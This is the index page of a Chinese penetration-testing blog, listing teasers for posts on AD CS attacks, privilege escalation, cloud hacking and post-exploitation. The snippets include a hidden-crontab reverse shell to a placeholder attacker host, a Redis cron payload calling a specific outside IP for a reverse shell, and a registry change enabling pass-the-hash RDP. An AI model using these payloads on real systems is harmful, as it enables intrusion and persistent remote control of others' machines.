EvilSwan
  • 首页
  • 关于我

Active Directory 证书服务 (AD CS) 攻击链完整指南

🔥 AD CS 攻击链:从菜鸟到大佬的完整Freestyle指南 🔥 这是什么鬼? 🎤 相关视频链接:https://www.bilibili.com/video/BV1niNfzhEka?spm_id_from=333.788.videopod.sections&vd_source=cfdf
2025-06-19
ActiveDirectory
#ActiveDirectory

有限控制

2025-06-11
C2
#CobaltStrike

博客重启-Outlaw挖矿僵尸网络排查

前言 说来也是惭愧,vps被黑产爆破进来挖矿并且还对外扫描导致服务器被封,然后排查干净了才重新开启,兄弟们,安全意识要做好啊。 背景 事故背景为某日正在睡觉,突然被手机的邮件提醒打断,定眼一看,我勒个去,怎么服务器又被封了?还是爆破他人ssh?这可把我急了,立马上线和客服摆头,好在最后客服给我恢复了
2025-06-11
#事件响应

Linux Privilege Escalation

相关视频:https://www.bilibili.com/video/BV1paNfzPErh/?spm_id_from=333.1387.homepage.video_card.click Enumeration - System Enumeration hostname uname -a ca
2025-06-04
PrivilegeEscalation
#权限提升

人工智能(AI)模型的安全挑战:多方面的风险剖析

摘要 在探讨人工智能(AI)模型的诸多安全挑战时,我们不得不提及数据安全问题。近日,一份来自[aiss.nsfocus.com](https://aiss.nsfocus.com)的详细报告揭示了AI模型在训练和部署阶段面临的多重风险。该报告指出,训练环境缺少认证授权、过度权限分配、插件权限管控设计
2025-02-08
AI
#AI#大模型安全

Tips in hide schedule tasks in Linux

(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/Attack-IP/PORT;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")
2025-01-19
Post-Exploit
#内网渗透#post-exploit

NTLM Login RDP

Victim Machine shell REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f shell REG query "HKLM\
2025-01-19
Post-Exploit
#横向移动 #内网渗透#post-exploit

云原生安全攻防指南

前言 文章主要根据kubernetes的威胁矩阵来进行书写,但是也会参考其他的资料。本文会结合之前在本地搭建的k8s集群进行讲解,具体搭建的文章可以参考前文。文章主要着笔点在初始访问,其他的如持久化,权限提升,凭据获取等可能会一笔带过或者只是提供一个标题供参考,因为写起来实在是又臭又长而且又和之前的
2024-12-22
CloudNative

Redis unauthorized post exploit

cron set 4a "\n\n*/1 * * * * bash -i >& /dev/tcp/120.79.51.115/91 0>&1\n" config set dir /var/spool/cron/ config set dbfilename root save webshell #
2024-12-06
Post-Exploit
#post-exploit
Cloud Hacking-(1)

Cloud Hacking-(1)

Docker Hacking Exposed Docker API When you install dcoker on a system it will expose an API on your local host located on port 2375.This API can be us
2024-12-01
CloudNative
1 2 3
Halo EvilSwan